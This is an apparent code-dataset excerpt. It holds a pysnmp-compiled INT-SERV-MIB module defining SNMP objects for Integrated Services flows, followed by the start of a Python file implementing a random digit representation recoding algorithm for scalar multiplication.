intSrvFlowFlowId=intSrvFlowFlowId, intSrvCompliances=intSrvCompliances, intSrv=intSrv, intSrvFlowNumber=intSrvFlowNumber, intSrvNotifications=intSrvNotifications, intSrvFlowQueue=intSrvFlowQueue, intSrvFlowBestEffort=intSrvFlowBestEffort, intSrvFlowType=intSrvFlowType, intSrvCompliance=intSrvCompliance, Port=Port, intSrvIfAttribStatus=intSrvIfAttribStatus, intSrvFlowPoliced=intSrvFlowPoliced, intSrvFlowDiscard=intSrvFlowDiscard, intSrvGenObjectsGroup=intSrvGenObjectsGroup, intSrvConformance=intSrvConformance)
| 129.878788
| 2,054
| 0.780876
|
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Counter32, IpAddress, ModuleIdentity, Unsigned32, MibIdentifier, NotificationType, Integer32, TimeTicks, Bits, mib_2, iso, Gauge32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Counter32", "IpAddress", "ModuleIdentity", "Unsigned32", "MibIdentifier", "NotificationType", "Integer32", "TimeTicks", "Bits", "mib-2", "iso", "Gauge32", "ObjectIdentity")
DisplayString, TruthValue, RowStatus, TestAndIncr, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "RowStatus", "TestAndIncr", "TextualConvention")
intSrv = ModuleIdentity((1, 3, 6, 1, 2, 1, 52))
if mibBuilder.loadTexts: intSrv.setLastUpdated('9710030642Z')
if mibBuilder.loadTexts: intSrv.setOrganization('IETF Integrated Services Working Group')
if mibBuilder.loadTexts: intSrv.setContactInfo(' Fred Baker Postal: Cisco Systems 519 Lado Drive Santa Barbara, California 93111 Tel: +1 805 681 0115 E-Mail: fred@cisco.com John Krawczyk Postal: ArrowPoint Communications 235 Littleton Road Westford, Massachusetts 01886 Tel: +1 508 692 5875 E-Mail: jjk@tiac.net')
if mibBuilder.loadTexts: intSrv.setDescription('The MIB module to describe the Integrated Services Protocol')
intSrvObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 1))
intSrvGenObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 2))
intSrvNotifications = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 3))
intSrvConformance = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4))
class SessionNumber(TextualConvention, Integer32):
description = 'The Session Number convention is used for numbers identifying sessions or saved PATH or RESV information. It is a number in the range returned by a TestAndIncr variable, having no protocol meaning whatsoever but serving instead as simple identifier. The alternative was a very complex instance or instance object that became unwieldy.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class Protocol(TextualConvention, Integer32):
description = 'The value of the IP Protocol field of an IP Datagram Header. This identifies the protocol layer above IP. For example, the value 6 is used for TCP and the value 17 is used for UDP. The values of this field are defined in the As- signed Numbers RFC.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class SessionType(TextualConvention, Integer32):
description = "The value of the C-Type field of a Session ob- ject, as defined in the RSVP specification. This value determines the lengths of octet strings and use of certain objects such as the 'port' variables. If the C-Type calls for an IP6 address, one would expect all source, des- tination, and next/previous hop addresses to be 16 bytes long, and for the ports to be UDP/TCP port numbers, for example."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class Port(TextualConvention, OctetString):
description = 'The value of the UDP or TCP Source or Destina- tion Port field, a virtual destination port or generalized port identifier used with the IPSEC Authentication Header or Encapsulating Security Payload, or other session discriminator. If it is not used, the value should be of length 0. This pair, when coupled with the IP Addresses of the source and destination system and the IP protocol field, uniquely identifies a data stream.'
status = 'current'
displayHint = 'd'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(2, 4)
class MessageSize(TextualConvention, Integer32):
description = 'The size of a message in bytes. This is used to specify the minimum and maximum size of a message along an integrated services route.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BitRate(TextualConvention, Integer32):
description = 'The rate, in bits/second, that data may move in the context. Applicable contexts minimally include the speed of an interface or virtual circuit, the data rate of a (potentially aggre- gated) data flow, or the data rate to be allo- cated for use by a flow.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BurstSize(TextualConvention, Integer32):
description = 'The number of octets of IP Data, including IP Headers, that a stream may send without concern for policing.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class QosService(TextualConvention, Integer32):
description = 'The class of service in use by a flow.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 5))
namedValues = NamedValues(("bestEffort", 1), ("guaranteedDelay", 2), ("controlledLoad", 5))
intSrvIfAttribTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 1), )
if mibBuilder.loadTexts: intSrvIfAttribTable.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribTable.setDescription("The reservable attributes of the system's in- terfaces.")
intSrvIfAttribEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: intSrvIfAttribEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribEntry.setDescription('The reservable attributes of a given inter- face.')
intSrvIfAttribAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 1), BitRate()).setUnits('Bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setDescription('The number of bits/second currently allocated to reserved sessions on the interface.')
intSrvIfAttribMaxAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 2), BitRate()).setUnits('Bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setDescription('The maximum number of bits/second that may be allocated to reserved sessions on the inter- face.')
intSrvIfAttribAllocatedBuffer = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 3), BurstSize()).setUnits('Bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setDescription('The amount of buffer space required to hold the simultaneous burst of all reserved flows on the interface.')
intSrvIfAttribFlows = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribFlows.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribFlows.setDescription('The number of reserved flows currently active on this interface. A flow can be created ei- ther from a reservation protocol (such as RSVP or ST-II) or via configuration information.')
intSrvIfAttribPropagationDelay = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 5), Integer32()).setUnits('microseconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setDescription('The amount of propagation delay that this in- terface introduces in addition to that intro- diced by bit propagation delays.')
intSrvIfAttribStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribStatus.setDescription("'active' on interfaces that are configured for RSVP.")
intSrvFlowTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 2), )
if mibBuilder.loadTexts: intSrvFlowTable.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowTable.setDescription("Information describing the reserved flows us- ing the system's interfaces.")
intSrvFlowEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 2, 1), ).setIndexNames((0, "INT-SERV-MIB", "intSrvFlowNumber"))
if mibBuilder.loadTexts: intSrvFlowEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowEntry.setDescription('Information describing the use of a given in- terface by a given flow. The counter intSrvFlowPoliced starts counting at the in- stallation of the flow.')
intSrvFlowNumber = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 1), SessionNumber())
if mibBuilder.loadTexts: intSrvFlowNumber.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNumber.setDescription('The number of this flow. This is for SNMP In- dexing purposes only and has no relation to any protocol value.')
intSrvFlowType = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 2), SessionType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowType.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowType.setDescription('The type of session (IP4, IP6, IP6 with flow information, etc).')
intSrvFlowOwner = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("rsvp", 2), ("management", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOwner.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOwner.setDescription('The process that installed this flow in the queue policy database.')
intSrvFlowDestAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddr.setDescription("The destination address used by all senders in this session. This object may not be changed when the value of the RowStatus object is 'ac- tive'.")
intSrvFlowSenderAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setDescription("The source address of the sender selected by this reservation. The value of all zeroes in- dicates 'all senders'. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setDescription("The length of the destination address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowSenderAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setDescription("The length of the sender's address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowProtocol = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 8), Protocol()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowProtocol.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowProtocol.setDescription("The IP Protocol used by a session. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 9), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestPort.setDescription("The UDP or TCP port number used as a destina- tion port for all senders in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol, is 50 (ESP) or 51 (AH), this represents a virtual destination port number. A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 10), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPort.setDescription("The UDP or TCP port number used as a source port for this sender in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol is 50 (ESP) or 51 (AH), this represents a generalized port identifier (GPI). A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowFlowId = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowFlowId.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowFlowId.setDescription('The flow ID that this sender is using, if this is an IPv6 session.')
intSrvFlowInterface = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 12), InterfaceIndex()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowInterface.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowInterface.setDescription('The ifIndex value of the interface on which this reservation exists.')
intSrvFlowIfAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowIfAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowIfAddr.setDescription('The IP Address on the ifEntry on which this reservation exists. This is present primarily to support those interfaces which layer multi- ple IP Addresses on the interface.')
intSrvFlowRate = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 14), BitRate()).setUnits('bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowRate.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowRate.setDescription("The Reserved Rate of the sender's data stream. If this is a Controlled Load service flow, this rate is derived from the Tspec rate parameter (r). If this is a Guaranteed service flow, this rate is derived from the Rspec clearing rate parameter (R).")
intSrvFlowBurst = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 15), BurstSize()).setUnits('bytes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowBurst.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBurst.setDescription("The size of the largest burst expected from the sender at a time. If this is less than the sender's advertised burst size, the receiver is asking the network to provide flow pacing beyond what would be provided under normal circumstances. Such pac- ing is at the network's option.")
intSrvFlowWeight = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 16), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowWeight.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowWeight.setDescription('The weight used to prioritize the traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of weighting procedures.')
intSrvFlowQueue = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 17), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowQueue.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowQueue.setDescription('The number of the queue used by this traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of queue identifiers.')
intSrvFlowMinTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 18), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMinTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMinTU.setDescription('The minimum message size for this flow. The policing algorithm will treat smaller messages as though they are this size.')
intSrvFlowMaxTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 19), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMaxTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMaxTU.setDescription('The maximum datagram size for this flow that will conform to the traffic specification. This value cannot exceed the MTU of the interface.')
intSrvFlowBestEffort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowBestEffort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBestEffort.setDescription('The number of packets that were remanded to best effort service.')
intSrvFlowPoliced = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowPoliced.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPoliced.setDescription("The number of packets policed since the incep- tion of the flow's service.")
intSrvFlowDiscard = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 22), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDiscard.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDiscard.setDescription("If 'true', the flow is to incur loss when traffic is policed. If 'false', policed traff- ic is treated as best effort traffic.")
intSrvFlowService = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 23), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowService.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowService.setDescription('The QoS service being applied to this flow.')
intSrvFlowOrder = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOrder.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOrder.setDescription('In the event of ambiguity, the order in which the classifier should make its comparisons. The row with intSrvFlowOrder=0 is tried first, and comparisons proceed in the order of in- creasing value. Non-serial implementations of the classifier should emulate this behavior.')
intSrvFlowStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 25), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowStatus.setDescription("'active' for all active flows. This object may be used to install static classifier infor- mation, delete classifier information, or au- thorize such.")
intSrvFlowNewIndex = MibScalar((1, 3, 6, 1, 2, 1, 52, 2, 1), TestAndIncr()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: intSrvFlowNewIndex.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNewIndex.setDescription("This object is used to assign values to intSrvFlowNumber as described in 'Textual Con- ventions for SNMPv2'. The network manager reads the object, and then writes the value back in the SET that creates a new instance of intSrvFlowEntry. If the SET fails with the code 'inconsistentValue', then the process must be repeated; If the SET succeeds, then the ob- ject is incremented, and the new instance is created according to the manager's directions.")
intSrvGroups = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 1))
intSrvCompliances = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 2))
intSrvCompliance = ModuleCompliance((1, 3, 6, 1, 2, 1, 52, 4, 2, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribGroup"), ("INT-SERV-MIB", "intSrvFlowsGroup"), ("INT-SERV-MIB", "intSrvGenObjectsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvCompliance = intSrvCompliance.setStatus('current')
if mibBuilder.loadTexts: intSrvCompliance.setDescription('The compliance statement ')
intSrvIfAttribGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribMaxAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribAllocatedBuffer"), ("INT-SERV-MIB", "intSrvIfAttribFlows"), ("INT-SERV-MIB", "intSrvIfAttribPropagationDelay"), ("INT-SERV-MIB", "intSrvIfAttribStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvIfAttribGroup = intSrvIfAttribGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvFlowsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 2)).setObjects(("INT-SERV-MIB", "intSrvFlowType"), ("INT-SERV-MIB", "intSrvFlowOwner"), ("INT-SERV-MIB", "intSrvFlowDestAddr"), ("INT-SERV-MIB", "intSrvFlowSenderAddr"), ("INT-SERV-MIB", "intSrvFlowDestAddrLength"), ("INT-SERV-MIB", "intSrvFlowSenderAddrLength"), ("INT-SERV-MIB", "intSrvFlowProtocol"), ("INT-SERV-MIB", "intSrvFlowDestPort"), ("INT-SERV-MIB", "intSrvFlowPort"), ("INT-SERV-MIB", "intSrvFlowFlowId"), ("INT-SERV-MIB", "intSrvFlowInterface"), ("INT-SERV-MIB", "intSrvFlowBestEffort"), ("INT-SERV-MIB", "intSrvFlowRate"), ("INT-SERV-MIB", "intSrvFlowBurst"), ("INT-SERV-MIB", "intSrvFlowWeight"), ("INT-SERV-MIB", "intSrvFlowQueue"), ("INT-SERV-MIB", "intSrvFlowMinTU"), ("INT-SERV-MIB", "intSrvFlowMaxTU"), ("INT-SERV-MIB", "intSrvFlowDiscard"), ("INT-SERV-MIB", "intSrvFlowPoliced"), ("INT-SERV-MIB", "intSrvFlowService"), ("INT-SERV-MIB", "intSrvFlowIfAddr"), ("INT-SERV-MIB", "intSrvFlowOrder"), ("INT-SERV-MIB", "intSrvFlowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvFlowsGroup = intSrvFlowsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvGenObjectsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 3)).setObjects(("INT-SERV-MIB", "intSrvFlowNewIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvGenObjectsGroup = intSrvGenObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvGenObjectsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
mibBuilder.exportSymbols("INT-SERV-MIB", BitRate=BitRate, intSrvIfAttribAllocatedBits=intSrvIfAttribAllocatedBits, intSrvFlowMaxTU=intSrvFlowMaxTU, intSrvFlowOrder=intSrvFlowOrder, PYSNMP_MODULE_ID=intSrv, Protocol=Protocol, intSrvIfAttribAllocatedBuffer=intSrvIfAttribAllocatedBuffer, intSrvFlowDestAddr=intSrvFlowDestAddr, intSrvFlowBurst=intSrvFlowBurst, intSrvIfAttribFlows=intSrvIfAttribFlows, intSrvFlowTable=intSrvFlowTable, intSrvFlowEntry=intSrvFlowEntry, intSrvFlowSenderAddrLength=intSrvFlowSenderAddrLength, intSrvIfAttribGroup=intSrvIfAttribGroup, intSrvFlowInterface=intSrvFlowInterface, intSrvFlowDestAddrLength=intSrvFlowDestAddrLength, intSrvFlowDestPort=intSrvFlowDestPort, BurstSize=BurstSize, intSrvFlowStatus=intSrvFlowStatus, intSrvIfAttribMaxAllocatedBits=intSrvIfAttribMaxAllocatedBits, intSrvFlowNewIndex=intSrvFlowNewIndex, intSrvGroups=intSrvGroups, MessageSize=MessageSize, intSrvFlowRate=intSrvFlowRate, intSrvFlowPort=intSrvFlowPort, intSrvFlowIfAddr=intSrvFlowIfAddr, SessionType=SessionType, intSrvIfAttribTable=intSrvIfAttribTable, intSrvIfAttribPropagationDelay=intSrvIfAttribPropagationDelay, intSrvFlowService=intSrvFlowService, intSrvFlowsGroup=intSrvFlowsGroup, intSrvFlowWeight=intSrvFlowWeight, intSrvFlowMinTU=intSrvFlowMinTU, intSrvFlowProtocol=intSrvFlowProtocol, intSrvFlowOwner=intSrvFlowOwner, intSrvIfAttribEntry=intSrvIfAttribEntry, intSrvFlowSenderAddr=intSrvFlowSenderAddr, QosService=QosService, SessionNumber=SessionNumber, intSrvObjects=intSrvObjects, intSrvGenObjects=intSrvGenObjects, intSrvFlowFlowId=intSrvFlowFlowId, intSrvCompliances=intSrvCompliances, intSrv=intSrv, intSrvFlowNumber=intSrvFlowNumber, intSrvNotifications=intSrvNotifications, intSrvFlowQueue=intSrvFlowQueue, intSrvFlowBestEffort=intSrvFlowBestEffort, intSrvFlowType=intSrvFlowType, intSrvCompliance=intSrvCompliance, Port=Port, intSrvIfAttribStatus=intSrvIfAttribStatus, intSrvFlowPoliced=intSrvFlowPoliced, intSrvFlowDiscard=intSrvFlowDiscard, intSrvGenObjectsGroup=intSrvGenObjectsGroup, intSrvConformance=intSrvConformance)
| true
| true
|
790b019a1dd927ca2c40f6dbe2c1d45b69a5be99
| 8,792
|
py
|
Python
|
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
import math
import random
import time
def average_density(rdr):
countZeros = 0
length = 0
for i in rdr:
length = length + 1
if (i == 0):
countZeros = countZeros + 1
return [length - countZeros, length]
def check_rdr(rdr):
for i in range (0, len(rdr)-1):
if rdr[i] != 0 and rdr[i+1] != 0:
return False
return True
def generate_random_D(m, l):
if l > (m+1)/2:
raise ValueError("l should satisfy the condition l <= (m+1)/2")
D = []
for i in range(2, l+1, 1):
odd = False
while not odd:
x = random.randint(3, m)
if(x % 2 != 0 and x not in D):
odd = True
D.append(x)
D.sort()
D.insert(0, 1)
return D
def add_carry_revised(bin_k):
len_k = len(bin_k)
# convert bin_k to an array to allow change of one bit easily
bin_s = list(bin_k)
carry = '0'
# If k is empty, Then carry needs to be added last.
if (bin_k == ''):
return '1'
# If LSB is 0, we just add carry to make it one. If it's 1, we make it 0 and carry is set to 1
if(bin_k[len_k-1] == '0'):
bin_s[len_k-1] = '1'
else:
bin_s[len_k-1] = '0'
carry = '1'
# index is set to the second LSB
index = len_k-2
while carry == '1':
# if k was only 1 bit, we just append the carry
if index == -1:
carry = '0'
bin_s.insert(0, '1')
# if we reached the MSB and it's 1, then we make it 0 and append 1,
# if it is 0, it is just set to 1.
elif index == 0:
carry = '0'
if (bin_s[index] == '1'):
bin_s[index] = '0'
bin_s.insert(0, '1')
else:
bin_s[index] = '1'
# if the bit is neither of the last two cases, it's set to 1 when it is 0,
# or it is set to 0, and carry is still 1
elif(bin_k[index] == '0'):
bin_s[index] = '1'
carry = '0'
else:
bin_s[index] = '0'
# Update the index
index = index - 1
# bin_s is converted back to a variable
bin_k = "".join(bin_s)
return bin_k
def get_Wn(D):
return int(math.floor(math.log(max(D), 2)))
def RDR_algorithm(D, k):
rdr = []
bin_k = bin(k)[2:]
# get number of bits
Wn = get_Wn(D)
flag_d = 0
while bin_k != '':
# If k is even, zero is appened to rdr and k is shifted right 1 bit
if bin_k[len(bin_k)-1] == '0':
rdr.insert(0, 0)
bin_k = bin_k[:len(bin_k)-1]
continue
# if LSB is not 0, we extract w bit
for w in range(Wn + 1, 0, -1):
# if the window is bigger than the length of k, we need to have smaller windwo
if (w > len(bin_k)):
continue
# we check every d in the digit set D
for d in D:
bin_d = bin(d)[2:] # get the binary representation of d
length_bin_d = len(bin_d)
# extract w bits from bin_k
k_reg = bin_k[len(bin_k) - w:]
# compute the negative residue of d, if neg_d is negative, it is ignored by setting it to 0.
neg_d = 2**w - d
while neg_d < 0:
neg_d = 0
neg_bin_d = bin(neg_d)[2:] # get the binary representation of neg_d
length_neg_bin_d = len(neg_bin_d)
# d cannot be chosen unless the value is less than the extracted window.
if d <= k_reg:
if int(bin_d, 2) ^ int(k_reg, 2) == 0:
rdr.insert(0, d)
# inserting w-1 zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
elif int(neg_bin_d, 2) ^ int(k_reg, 2) == 0 and neg_d != 1:
rdr.insert(0, -d)
# Inserting zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# update k after adding a carry to LSB
bin_k = add_carry_revised(bin_k)
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
# break out of the for loop to check if we finished k or not
if flag_d == 1:
flag_d = 0
break
# In the end, there might be some leading zeros which are not needed,
# this while loop removes the leading zeros and update k accordingly
while (rdr[0] == 0):
rdr = rdr[1:]
# return the result, and length of result
return rdr
# this function return the value of rdr representation.
